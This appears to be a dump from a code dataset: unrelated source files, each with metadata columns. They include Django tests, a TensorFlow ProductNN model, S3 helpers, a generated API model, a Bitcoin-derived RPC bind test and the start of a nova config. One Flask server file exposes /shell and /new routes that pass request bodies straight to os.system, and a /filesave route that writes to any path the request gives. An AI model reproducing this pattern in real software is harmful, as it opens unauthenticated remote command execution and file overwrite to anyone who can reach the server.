long_field_index = models.Index(fields=['pages'])
long_field_index.set_name_with_model(Book)
self.assertEqual(long_field_index.name, 'model_index_page_co_69235a_idx')
# suffix can't be longer than 3 characters.
long_field_index.suffix = 'suff'
msg = 'Index too long for multiple database support. Is self.suffix longer than 3 characters?'
with self.assertRaisesMessage(AssertionError, msg):
long_field_index.set_name_with_model(Book)
def test_deconstruction(self):
index = models.Index(fields=['title'])
index.set_name_with_model(Book)
path, args, kwargs = index.deconstruct()
self.assertEqual(path, 'django.db.models.Index')
self.assertEqual(args, ())
self.assertEqual(kwargs, {'fields': ['title'], 'name': 'model_index_title_196f42_idx'})
def test_clone(self):
index = models.Index(fields=['title'])
new_index = index.clone()
self.assertIsNot(index, new_index)
self.assertEqual(index.fields, new_index.fields)
def test_abstract_children(self):
index_names = [index.name for index in ChildModel1._meta.indexes]
self.assertEqual(index_names, ['model_index_name_440998_idx'])
index_names = [index.name for index in ChildModel2._meta.indexes]
self.assertEqual(index_names, ['model_index_name_b6c374_idx'])
| desktop/core/ext-py/Django-1.11/tests/model_indexes/tests.py | 3,855 | '-' for DESC columns should be accounted for in the index name. fields may be truncated in the name. db_column is used for naming. suffix can't be longer than 3 characters. | 172 | en | 0.918759 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import numpy as np
from time import time
import tensorflow as tf
from sklearn.base import BaseEstimator, TransformerMixin
from sklearn.metrics import roc_auc_score
class ProductNN(BaseEstimator, TransformerMixin):
def __init__(self, feature_size, field_size, embedding_size=8,
deep_layers=None, deep_init_size=50, dropout_deep=None,
deep_layer_activation=tf.nn.relu, epoch=10, batch_size=256,
learning_rate=0.001, optimizer="adam", batch_norm=0,
batch_norm_decay=0.995, verbose=False, random_seed=2016,
loss_type="logloss", eval_metric=roc_auc_score,
greater_is_better=True, use_inner=True):
assert loss_type in ["logloss", "mse"],\
"loss_type can be either 'logloss' for classification task or 'mse' for regression task"
if deep_layers is None:
deep_layers = [32, 32]
if dropout_deep is None:
dropout_deep = [0.5, 0.5, 0.5]
self.feature_size = feature_size
self.field_size = field_size
self.embedding_size = embedding_size
self.deep_layers = deep_layers
self.deep_init_size = deep_init_size
self.dropout_dep = dropout_deep
self.deep_layers_activation = deep_layer_activation
self.epoch = epoch
self.batch_size = batch_size
self.learning_rate = learning_rate
self.optimizer_type = optimizer
self.batch_norm = batch_norm
self.batch_norm_decay = batch_norm_decay
self.verbose = verbose
self.random_seed = random_seed
self.loss_type = loss_type
self.greater_is_better = greater_is_better
self.train_result, self.valid_result = [], []
self.use_inner = use_inner
self._init_graph()
def _init_graph(self):
self.graph = tf.Graph()
with self.graph.as_default():
tf.set_random_seed(self.random_seed)
            # input data (model input placeholders)
self.feat_index = tf.placeholder(tf.int32, shape=[None, None],
name='feat_index')
self.feat_value = tf.placeholder(tf.float32, shape=[None, None],
name='feat_value')
self.label = tf.placeholder(tf.float32, shape=[None, 1], name='label')
self.dropout_keep_deep = tf.placeholder(tf.float32, shape=[None],
name='dropout_deep_deep')
self.train_phase = tf.placeholder(tf.bool, name='train_phase')
            # weight initialization
self.weights = self._initialize_weights()
# model
self.embeddings = tf.nn.embedding_lookup(self.weights['feature_embeddings'], self.feat_index)
feat_value = tf.reshape(self.feat_value, shape=[-1, self.field_size, 1])
self.embeddings = tf.multiply(self.embeddings, feat_value)
# linear signal
linear_output = []
for i in range(self.deep_init_size):
linear_output.append(tf.reshape(tf.reduce_sum(
tf.multiply(self.embeddings, self.weights['product-linear'][i]),
axis=[1, 2]), shape=(-1, 1)))
self.lz = tf.concat(linear_output, axis=1)
# quadratic signal
quadratic_output = []
if self.use_inner:
for i in range(self.deep_init_size):
theta = tf.multiply(
self.embeddings, tf.reshape(self.weights['product-quadratic-inner'][i], (1, -1, 1)))
quadratic_output.append(tf.reshape(
tf.norm(tf.reduce_sum(theta, axis=1), axis=1), shape=(-1, 1)))
else:
embedding_sum = tf.reduce_sum(self.embeddings, axis=1)
p = tf.matmul(tf.expand_dims(embedding_sum, 2), tf.expand_dims(embedding_sum, 1))
for i in range(self.deep_init_size):
theta = tf.multiply(p, tf.expand_dims(
self.weights['product-quadratic-outer'][i], 0))
quadratic_output.append(tf.reshape(
tf.reduce_sum(theta, axis=[1, 2]), shape=(-1, 1)))
self.lp = tf.concat(quadratic_output, axis=1)
self.y_deep = tf.nn.relu(tf.add(tf.add(self.lz, self.lp), self.weights['product-bias']))
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[0])
# deep part
for i in range(0, len(self.deep_layers)):
self.y_deep = tf.add(tf.matmul(self.y_deep, self.weights["layer_%d" % i]), self.weights["bias_%d" % i])
self.y_deep = self.deep_layers_activation(self.y_deep)
self.y_deep = tf.nn.dropout(self.y_deep, self.dropout_keep_deep[i+1])
self.out = tf.add(tf.matmul(self.y_deep, self.weights['output']), self.weights['output_bias'])
            # loss function
if self.loss_type == "logloss":
self.out = tf.nn.sigmoid(self.out)
self.loss = tf.losses.log_loss(self.label, self.out)
elif self.loss_type == "mse":
self.loss = tf.nn.l2_loss(tf.subtract(self.label, self.out))
            # optimizer selection
if self.optimizer_type == "adam":
self.optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate, beta1=0.9, beta2=0.999,
epsilon=1e-8).minimize(self.loss)
elif self.optimizer_type == "adagrad":
self.optimizer = tf.train.AdagradOptimizer(learning_rate=self.learning_rate,
initial_accumulator_value=1e-8).minimize(self.loss)
elif self.optimizer_type == "gd":
self.optimizer = tf.train.GradientDescentOptimizer(learning_rate=self.learning_rate).minimize(self.loss)
elif self.optimizer_type == "momentum":
self.optimizer = tf.train.MomentumOptimizer(learning_rate=self.learning_rate,
momentum=0.95).minimize(self.loss)
# init
self.saver = tf.train.Saver()
init = tf.global_variables_initializer()
self.sess = tf.Session()
self.sess.run(init)
# number of params
total_parameters = 0
for variable in self.weights.values():
shape = variable.get_shape()
variable_parameters = 1
for dim in shape:
variable_parameters *= dim.value
total_parameters += variable_parameters
if self.verbose > 0:
print("#params: %d" % total_parameters)
def _initialize_weights(self):
weights = dict()
# Sparse Features->Dense Embeddings weight initializing
        # weight matrix of the embedding layer applied to the one-hot encoded input
weights['feature_embeddings'] = tf.Variable(tf.random_normal(
[self.feature_size, self.embedding_size], 0.0, 0.01), name='feature_embeddings')
weights['feature_bias'] = tf.Variable(tf.random_normal(
[self.feature_size, 1], 0.0, 1.0), name='feature_bias')
# Product Layers
if self.use_inner:
weights['product-quadratic-inner'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size], 0.0, 0.01))
else:
weights['product-quadratic-outer'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.embedding_size, self.embedding_size], 0.0, 0.01))
weights['product-linear'] = tf.Variable(tf.random_normal(
[self.deep_init_size, self.field_size, self.embedding_size], 0.0, 0.01))
        weights['product-bias'] = tf.Variable(tf.random_normal([self.deep_init_size, ], 0.0, 1.0))  # mean 0.0, stddev 1.0
        # Deep layers weight initialization (Xavier)
num_layer = len(self.deep_layers)
input_size = self.deep_init_size
glorot = np.sqrt(2.0/(input_size + self.deep_layers[0])) # var(w)=2/(nin+nout)
weights['layer_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(input_size, self.deep_layers[0])), dtype=np.float32)
weights['bias_0'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[0])), dtype=np.float32)
for i in range(1, num_layer):
glorot = np.sqrt(2.0 / (self.deep_layers[i - 1] + self.deep_layers[i]))
weights["layer_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[i - 1], self.deep_layers[i])),
dtype=np.float32) # layers[i-1] * layers[i]
weights["bias_%d" % i] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(1, self.deep_layers[i])),
dtype=np.float32) # 1 * layer[i]
# final concat projection layer
glorot = np.sqrt(2.0/(input_size + 1))
weights['output'] = tf.Variable(np.random.normal(
loc=0, scale=glorot, size=(self.deep_layers[-1], 1)), dtype=np.float32)
weights['output_bias'] = tf.Variable(tf.constant(0.01), dtype=np.float32)
return weights
# noinspection PyMethodMayBeStatic
def get_batch(self, xi, xv, y, batch_size, index):
start = index * batch_size
end = (index + 1) * batch_size
end = end if end < len(y) else len(y)
return xi[start:end], xv[start:end], [[y_] for y_ in y[start:end]]
# noinspection PyMethodMayBeStatic
def shuffle_in_unison_scary(self, a, b, c):
rng_state = np.random.get_state()
np.random.shuffle(a)
np.random.set_state(rng_state)
np.random.shuffle(b)
np.random.set_state(rng_state)
np.random.shuffle(c)
def predict(self, xi, xv):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
out = self.sess.run(self.out, feed_dict=feed_dict)
return out
def evaluate(self, xi, xv, y):
y = [[y_] for y_ in y]
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: [1.0] * len(self.dropout_dep),
self.train_phase: True}
loss = self.sess.run([self.loss], feed_dict=feed_dict)
return loss
def fit_on_batch(self, xi, xv, y):
feed_dict = {self.feat_index: xi,
self.feat_value: xv,
self.label: y,
self.dropout_keep_deep: self.dropout_dep,
self.train_phase: True}
loss, opt = self.sess.run([self.loss, self.optimizer], feed_dict=feed_dict)
return loss
def fit(self, xi_train, xv_train, y_train, xi_valid=None, xv_valid=None,
y_valid=None, early_stopping=False, refit=False):
"""
:param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
vali_j can be either binary (1/0, for binary/categorical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
"""
has_valid = xv_valid is not None
for epoch in range(self.epoch):
t1 = time()
            # shuffle the dataset
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
            # get batch data and fit on it
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
            # evaluate on the training and validation datasets
train_result = self.evaluate(xi_train, xv_train, y_train)
self.train_result.append(train_result[0])
if has_valid:
valid_result = self.evaluate(xi_valid, xv_valid, y_valid)
self.valid_result.append(valid_result[0])
if self.verbose > 0 and epoch % self.verbose == 0:
if has_valid:
print("[%d] train-loss=%.4f, valid-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], valid_result[0], time() - t1))
else:
print("[%d] train-loss=%.4f [%.1f s]"
% (epoch + 1, train_result[0], time() - t1))
if has_valid and early_stopping and self.training_termination(self.valid_result):
break
# fit a few more epoch on train+valid until result reaches the best_train_score
if has_valid and refit:
if self.greater_is_better:
best_valid_score = max(self.valid_result)
else:
best_valid_score = min(self.valid_result)
best_epoch = self.valid_result.index(best_valid_score)
best_train_score = self.train_result[best_epoch]
xi_train = xi_train + xi_valid
xv_train = xv_train + xv_valid
y_train = y_train + y_valid
for epoch in range(100):
self.shuffle_in_unison_scary(xi_train, xv_train, y_train)
total_batch = int(len(y_train) / self.batch_size)
for i in range(total_batch):
xi_batch, xv_batch, y_batch = self.get_batch(xi_train, xv_train,
y_train, self.batch_size, i)
self.fit_on_batch(xi_batch, xv_batch, y_batch)
# check the model performance
train_result = self.evaluate(xi_train, xv_train, y_train)
ckp1 = abs(train_result - best_train_score) < 0.001
ckp2 = self.greater_is_better and train_result > best_train_score
ckp3 = (not self.greater_is_better) and train_result < best_train_score
if ckp1 or ckp2 or ckp3:
break
def training_termination(self, valid_result):
if len(valid_result) > 5:
if self.greater_is_better:
if valid_result[-1] < valid_result[-2] < valid_result[-3] < valid_result[-4] < valid_result[-5]:
return True
else:
if valid_result[-1] > valid_result[-2] > valid_result[-3] > valid_result[-4] > valid_result[-5]:
return True
return False
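# Hypothetical usage sketch (not part of the original file): the sample data,
# sizes and hyper-parameters below are made up, and TensorFlow 1.x is assumed.
# Feature indices/values follow the layout described in fit()'s docstring.
if __name__ == '__main__':
    xi = [[0, 3], [1, 4], [2, 5]]               # feature index per field, 3 samples
    xv = [[1.0, 1.0], [1.0, 0.5], [1.0, 2.0]]   # feature value per field
    y = [1, 0, 1]
    model = ProductNN(feature_size=10, field_size=2, embedding_size=4,
                      deep_init_size=5, epoch=1, batch_size=2, verbose=1)
    model.fit(xi, xv, y)
    print(model.predict(xi, xv))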
| tutorials/chapter_05_ProductNN/ProductNN.py | 15,649 | :param xi_train: [[ind1_1, ind1_2, ...], ..., [indi_1, indi_2, ..., indi_j, ...], ...]
indi_j is the feature index of feature field j of sample i in the training set
:param xv_train: [[val1_1, val1_2, ...], ..., [vali_1, vali_2, ..., vali_j, ...], ...]
vali_j is the feature value of feature field j of sample i in the training set
vali_j can be either binary (1/0, for binary/categorical features)
:param y_train: label of each sample in the training set
:param xi_valid: list of list of feature indices of each sample in the validation set
:param xv_valid: list of list of feature values of each sample in the validation set
:param y_valid: label of each sample in the validation set
:param early_stopping: perform early stopping or not
:param refit: refit the model on the train+valid dataset or not
:return: None
!/usr/bin/python -*- coding: utf-8 -*- input data,模型输入 weight initializing,权重初始化 model linear signal quadratic signal deep part loss,代价函数 optimizer,优化器选择 init number of params Sparse Features->Dense Embeddings weight initializing one-hot编码后输入到Embedding的权重矩阵初始化 Product Layers Deep layers weight initializing,Xavier初始化 var(w)=2/(nin+nout) layers[i-1] * layers[i] 1 * layer[i] final concat projection layer noinspection PyMethodMayBeStatic noinspection PyMethodMayBeStatic shuffle the dataset,打乱dataset顺序 get batch data and fit them,获得batch数据并fit evaluate training and validation dataset,评价train/valid dataset fit a few more epoch on train+valid until result reaches the best_train_score check the model performance | 1,582 | en | 0.658959 |
# -*- coding: utf-8 -*-
"""
Created on Tue May 12 00:00:00 2020
@author: Shaji
"""
import boto3
import os
boto3.setup_default_session()
s3_client = boto3.client('s3')
def list_buckets(client=s3_client):
"""
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
"""
    response = client.list_buckets()
buckets=[]
for bucket in response['Buckets']:
buckets.append(bucket["Name"])
return buckets
def list_objects(bucket,prefix='',client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
return keys,list(dirs)
def download_dir(bucket, prefix, local_path, client=s3_client):
"""
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
"""
keys = []
dirs = set()
next_token = ''
base_kwargs = {
'Bucket':bucket,
'Prefix':prefix,
}
local=local_path+bucket+'\\'
while next_token is not None:
kwargs = base_kwargs.copy()
if next_token != '':
kwargs.update({'ContinuationToken': next_token})
results = client.list_objects_v2(**kwargs)
contents = results.get('Contents')
for i in contents:
k = i.get('Key')
keys.append(k)
dirs.add(k[:k.rfind('/')+1])
next_token = results.get('NextContinuationToken')
for d in dirs:
dest_pathname = os.path.join(local, d)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
for k in keys:
dest_pathname = os.path.join(local, k)
if not os.path.exists(os.path.dirname(dest_pathname)):
os.makedirs(os.path.dirname(dest_pathname))
client.download_file(bucket, k, dest_pathname)
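# Hypothetical usage sketch (bucket name, prefix and local path below are
# placeholders, not part of the original module); it assumes AWS credentials
# are already configured for boto3.
if __name__ == '__main__':
    print(list_buckets())
    keys, dirs = list_objects('my-example-bucket', prefix='reports/2020/')
    print('%d objects in %d directories' % (len(keys), len(dirs)))
    download_dir('my-example-bucket', 'reports/2020/', 'C:\\data\\')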
| ctrl4bi/aws_connect.py | 2,775 | Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[local path to folder in which to place files],[arg4]:[initialized s3 client object],
Description: Downloads the contents to the local path
Usage: [arg1]:[initialized s3 client object],
Description: Gets the list of buckets
Returns: [list of buckets]
Usage: [arg1]:[bucket name],[arg2]:[pattern to match keys in s3],[arg3]:[initialized s3 client object],
Description: Gets the keys in the S3 location
Returns: [list of keys], [list of directories]
Created on Tue May 12 00:00:00 2020
@author: Shaji
-*- coding: utf-8 -*- | 594 | en | 0.820245 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
"""
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: dev@submarine.apache.org
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from submarine.experiment.configuration import Configuration
class KernelSpec(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {"name": "str", "channels": "list[str]", "dependencies": "list[str]"}
attribute_map = {"name": "name", "channels": "channels", "dependencies": "dependencies"}
def __init__(
self, name=None, channels=None, dependencies=None, local_vars_configuration=None
): # noqa: E501
"""KernelSpec - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._name = None
self._channels = None
self._dependencies = None
self.discriminator = None
if name is not None:
self.name = name
if channels is not None:
self.channels = channels
if dependencies is not None:
self.dependencies = dependencies
@property
def name(self):
"""Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
"""
self._name = name
@property
def channels(self):
"""Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._channels
@channels.setter
def channels(self, channels):
"""Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._channels = channels
@property
def dependencies(self):
"""Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
"""
return self._dependencies
@dependencies.setter
def dependencies(self, dependencies):
"""Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
"""
self._dependencies = dependencies
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(
map(lambda x: x.to_dict() if hasattr(x, "to_dict") else x, value)
)
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(
map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict")
else item,
value.items(),
)
)
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, KernelSpec):
return False
return self.to_dict() == other.to_dict()
def __ne__(self, other):
"""Returns true if both objects are not equal"""
if not isinstance(other, KernelSpec):
return True
return self.to_dict() != other.to_dict()
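# Minimal usage sketch (an assumption, not part of the generated module); it
# requires the submarine package to be importable, and the spec values below
# are made up.
if __name__ == "__main__":
    spec = KernelSpec(name="team_default_python_3",
                      channels=["defaults"],
                      dependencies=["numpy"])
    print(spec.to_dict())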
| submarine-sdk/pysubmarine/submarine/experiment/models/kernel_spec.py | 5,683 | NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Returns true if both objects are equal
KernelSpec - a model defined in OpenAPI
Returns true if both objects are not equal
For `print` and `pprint`
Gets the channels of this KernelSpec. # noqa: E501
:return: The channels of this KernelSpec. # noqa: E501
:rtype: list[str]
Sets the channels of this KernelSpec.
:param channels: The channels of this KernelSpec. # noqa: E501
:type: list[str]
Gets the dependencies of this KernelSpec. # noqa: E501
:return: The dependencies of this KernelSpec. # noqa: E501
:rtype: list[str]
Sets the dependencies of this KernelSpec.
:param dependencies: The dependencies of this KernelSpec. # noqa: E501
:type: list[str]
Gets the name of this KernelSpec. # noqa: E501
:return: The name of this KernelSpec. # noqa: E501
:rtype: str
Sets the name of this KernelSpec.
:param name: The name of this KernelSpec. # noqa: E501
:type: str
Returns the model properties as a dict
Returns the string representation of the model
Submarine Experiment API
The Submarine REST API allows you to create, list, and get experiments. The API is hosted under the /v1/experiment route on the Submarine server. For example, to list experiments on a server hosted at http://localhost:8080, access http://localhost:8080/api/v1/experiment/ # noqa: E501
The version of the OpenAPI document: 0.6.0-SNAPSHOT
Contact: dev@submarine.apache.org
Generated by: https://openapi-generator.tech
Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. coding: utf-8 noqa: F401 noqa: E501 noqa: E501 | 2,339 | en | 0.767156 |
# Proton JS - Proton.py
# by Acropolis Point
# module imports
import os
import json
import time
from flask import Flask, jsonify, request, render_template
app = Flask(__name__)
@app.route('/new', methods=['POST'])
# new() function definition
def new():
os.system("python3 window.py " + request.get_data(as_text = True))
return 'OK'
@app.route('/shell', methods=['POST'])
# shell() function definition
def shell():
os.system(request.get_data(as_text = True))
return 'OK'
@app.route('/filesave', methods=['POST'])
def filesave():
theFile = open(request.get_data(as_text = True).split(", ")[1], "w+")
theFile.write(request.get_data(as_text = True).split(", ")[0])
return 'OK'
@app.route('/close', methods=['POST'])
def close():
theFile = open("output.json", "r+")
theFileParsed = json.load(theFile)
theFileParsed['close'] = request.get_data(as_text = True)
theFile.seek(0)
theFile.write(json.dumps(theFileParsed) + " ")
time.sleep(200)
theFile.write("{ \"close\": \"\" }")
return 'OK'
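# Minimal run sketch (an assumption, not present in the original file): start
# Flask's development server so the /new, /shell, /filesave and /close routes
# become reachable, e.g. via POST requests from the Proton front end.
if __name__ == '__main__':
    app.run()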
| server.py | 1,055 | Proton JS - Proton.py by Acropolis Point module imports new() function definition shell() function definition | 109 | en | 0.291815 |
#!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Copyright (c) 2017 The Californiacoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test running californiacoind with the -rpcbind and -rpcallowip options."""
import socket
import sys
from test_framework.test_framework import CaliforniacoinTestFramework, SkipTest
from test_framework.util import *
from test_framework.netutil import *
class RPCBindTest(CaliforniacoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def setup_network(self):
self.add_nodes(self.num_nodes, None)
def run_bind_test(self, allow_ips, connect_to, addresses, expected):
'''
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
'''
self.log.info("Bind test for %s" % str(addresses))
expected = [(addr_to_hex(addr), port) for (addr, port) in expected]
base_args = ['-disablewallet', '-nolisten']
if allow_ips:
base_args += ['-rpcallowip=' + x for x in allow_ips]
binds = ['-rpcbind='+addr for addr in addresses]
self.nodes[0].rpchost = connect_to
self.start_node(0, base_args + binds)
pid = self.nodes[0].process.pid
assert_equal(set(get_bind_addrs(pid)), set(expected))
self.stop_nodes()
def run_allowip_test(self, allow_ips, rpchost, rpcport):
'''
Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
'''
self.log.info("Allow IP test for %s:%d" % (rpchost, rpcport))
base_args = ['-disablewallet', '-nolisten'] + ['-rpcallowip='+x for x in allow_ips]
self.nodes[0].rpchost = None
self.start_nodes([base_args])
# connect to node through non-loopback interface
node = get_rpc_proxy(rpc_url(get_datadir_path(self.options.tmpdir, 0), 0, "%s:%d" % (rpchost, rpcport)), 0, coveragedir=self.options.coveragedir)
node.getnetworkinfo()
self.stop_nodes()
def run_test(self):
# due to OS-specific network stats queries, this test works only on Linux
if not sys.platform.startswith('linux'):
raise SkipTest("This test can only be run on linux.")
# find the first non-loopback interface for testing
non_loopback_ip = None
for name,ip in all_interfaces():
if ip != '127.0.0.1':
non_loopback_ip = ip
break
if non_loopback_ip is None:
raise SkipTest("This test requires at least one non-loopback IPv4 interface.")
try:
s = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
s.connect(("::1",1))
            s.close()
except OSError:
raise SkipTest("This test requires IPv6 support.")
self.log.info("Using interface %s for testing" % non_loopback_ip)
defaultport = rpc_port(0)
# check default without rpcallowip (IPv4 and IPv6 localhost)
self.run_bind_test(None, '127.0.0.1', [],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check default with rpcallowip (IPv6 any)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', [],
[('::0', defaultport)])
# check only IPv4 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1'],
[('127.0.0.1', defaultport)])
# check only IPv4 localhost (explicit) with alternative port
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171'],
[('127.0.0.1', 32171)])
# check only IPv4 localhost (explicit) with multiple alternative ports on same host
self.run_bind_test(['127.0.0.1'], '127.0.0.1:32171', ['127.0.0.1:32171', '127.0.0.1:32172'],
[('127.0.0.1', 32171), ('127.0.0.1', 32172)])
# check only IPv6 localhost (explicit)
self.run_bind_test(['[::1]'], '[::1]', ['[::1]'],
[('::1', defaultport)])
# check both IPv4 and IPv6 localhost (explicit)
self.run_bind_test(['127.0.0.1'], '127.0.0.1', ['127.0.0.1', '[::1]'],
[('127.0.0.1', defaultport), ('::1', defaultport)])
# check only non-loopback interface
self.run_bind_test([non_loopback_ip], non_loopback_ip, [non_loopback_ip],
[(non_loopback_ip, defaultport)])
# Check that with invalid rpcallowip, we are denied
self.run_allowip_test([non_loopback_ip], non_loopback_ip, defaultport)
assert_raises_rpc_error(-342, "non-JSON HTTP response with '403 Forbidden' from server", self.run_allowip_test, ['1.1.1.1'], non_loopback_ip, defaultport)
if __name__ == '__main__':
RPCBindTest().main()
| test/functional/rpcbind_test.py | 4,951 | Start a node with rpcallow IP, and request getnetworkinfo
at a non-localhost IP.
Start a node with requested rpcallowip and rpcbind parameters,
then try to connect, and check if the set of bound addresses
matches the expected set.
Test running californiacoind with the -rpcbind and -rpcallowip options.
!/usr/bin/env python3 Copyright (c) 2014-2016 The Bitcoin Core developers Copyright (c) 2017 The Californiacoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. connect to node through non-loopback interface due to OS-specific network stats queries, this test works only on Linux find the first non-loopback interface for testing check default without rpcallowip (IPv4 and IPv6 localhost) check default with rpcallowip (IPv6 any) check only IPv4 localhost (explicit) check only IPv4 localhost (explicit) with alternative port check only IPv4 localhost (explicit) with multiple alternative ports on same host check only IPv6 localhost (explicit) check both IPv4 and IPv6 localhost (explicit) check only non-loopback interface Check that with invalid rpcallowip, we are denied | 1,178 | en | 0.717955 |
# needs:fix_opt_description
# needs:check_deprecation_status
# needs:check_opt_group_and_type
# needs:fix_opt_description_indentation
# needs:fix_opt_registration_consistency
# Copyright 2016 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import itertools
from oslo_config import cfg
from nova.conf import paths
# Downtime period in milliseconds
LIVE_MIGRATION_DOWNTIME_MIN = 100
# Step count
LIVE_MIGRATION_DOWNTIME_STEPS_MIN = 3
# Delay in seconds
LIVE_MIGRATION_DOWNTIME_DELAY_MIN = 10
libvirt_group = cfg.OptGroup("libvirt",
title="Libvirt Options",
help="""
Libvirt options allow the cloud administrator to configure the libvirt
